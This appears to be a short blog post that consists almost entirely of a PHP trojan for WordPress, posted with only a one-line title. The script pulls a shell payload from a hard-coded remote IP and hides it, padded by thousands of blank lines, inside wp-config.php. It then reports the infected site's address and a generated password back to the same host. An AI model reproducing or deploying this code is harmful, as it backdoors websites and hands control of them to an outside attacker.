<?php $file = str_replace('wp-content/uploads/','', dirname(__FILE__)).'/wp-config.php'; $tmp = file_get_contents($file); $ch = curl_init(); $url = 'http://191.196.116.120/test/sh'; curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE); $head = curl_exec($ch); curl_close($ch); $pass = md5(rand(0,1000)); $head = str_replace('#####',$pass,$head); for($i=0;$i<5000;$i++){ $temp = $temp . "\n"; } $code = 'require_once(ABSPATH . \'wp-settings.php\');' . $temp . $head . $temp; $tmp = str_replace('require_once(ABSPATH . \'wp-settings.php\');',$code,$tmp); $f = fopen($file,"w"); fputs($f,$tmp); fclose($f); $ch = curl_init(); $url_self = 'http://' . $_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF']; $url = 'http://191.196.116.120/newshells.php?url='.$url_self.'&pass='.$pass; curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE); $head = curl_exec($ch); curl_close($ch); ?>Troyan on php which prescribes in wp-config.php shell
Saturday, January 7, 2012
Troyan on php which prescribes in wp-config.php shell
Subscribe to:
Post Comments (Atom)
No comments:
Post a Comment